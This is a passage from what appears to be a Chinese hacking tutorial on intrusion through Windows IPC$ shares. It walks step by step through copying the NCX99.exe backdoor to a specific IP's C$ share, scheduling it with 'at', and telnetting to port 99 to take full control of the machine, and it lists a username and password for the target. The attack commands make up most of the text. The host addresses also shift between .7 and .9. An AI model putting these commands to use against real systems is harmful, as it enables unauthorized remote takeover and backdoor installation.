6.1.1节我们了解了基于IPC$共享入侵的简单入侵,本小节结合上一小节内容来深入来了解一下基于IPC$共享的中级入侵。
测试主机:61.150.115.7(Windows2000)
用户名:System32(隶属Administrators组)
口令:ffhh.net
● Windows NT下的:command.com
● Windows 2000下的:命令提示符(即:cmd.exe)
● 后门程序:NCX99.exe (用于远程登录到目标服务器的99号端口)
所用系统为:Windows 2000 Professional
例如,通过IPC$共享和远程61.150.115.7建立了远程连接(请参阅上一章节),所得到的是可以控制其硬盘读写操作,但是一个入侵者不会就此停手,还会进一步地控制目标机,接下来看看入侵者是如何完全控制目标机的。
(1) 在命令提示符下输入如下命令格式:
copy d:\hacker\ncx99.exe \\61.150.115.9\c$
命令解释:
将本地D盘hacker文夹下的NCX99.exe程序复制到61.150.115.9的C盘下。
输入完毕后按Enter键,等待几秒钟后将会显示文件已复制,如图6-14所示。
图6-14 在命令提示符下向目标机复制文件
注:
这里也可以通过将目标机61.150.115.9中的C盘映射到本地盘,然后直接复制过去,如图6-15所示。
图6-15 通过映射将ncx.exe程序复制到目标机
通过图6-16可以看到NCX.exe成功地添加到目标机的C盘下。
(2) 在命令提示符下输入如下命令格式:
net time \\61.150.115.9
图6-16 NCX99.exe成功地被复制到目标机的C盘下
命令解释:
查看目标机61.150.115.9上的时间。
输入完毕后按Enter键,将会显示目标机现在的时间,如图6-17所示。
图6-17 查看目标机上的时间
注:
屏幕上现在显示的时间是下午03:27,但是系统所采用的是24小时制,那么现在目标机上的时间就是15:27。
(3) 在命令提示符下输入如下命令格式:
at \\61.150.115.9 15:29 c:\ncx99.exe
命令解释:
让61.150.115.9在15:29时执行ncx99.exe程序,也就将ncx99.exe添加到目标机的计划任务中,让它在15:29时自动运行。
输入完毕后按Enter键,将出现新加了一项作业的字样,如图6-18所示。
图6-18 添加计划任务
注意:
通过net time \\61.150.115.9得知目标服务器上的时间是15:27,但在添加计划任务时将时间设为15:29,这是因为本地到远程传输时需一定的时间,为了确保NCX99.exe的运行,因此将计划执行的时间向后推2分钟。在这里也可以通过如下命令查看计划是否被添加:
at \\61.150.115.9
命令解释:
查看目标机计划任务列表输入完毕后,按Enter键即可看到如图6-19所示,计划被成功添加。
图6-19 查看目标机计划任务列表
(4) 过2分钟后,在命令提示符下输入如下命令格式:
telnet 61.150.115.9 99
则如图6-20所示的画面。
图6-20 通过99号端口远程登录到目标机
命令解释:
目标服务器执行NCX99.exe后,就会在本机开启一个99号端口,用于远程登录。
命令输入完毕后按下Enter键,即可远程登录到目标机,如图6-21所示。
图6-21 远程登录到目标机
此时已完全控制了目标机。
(5) 入侵检测成功完成!
……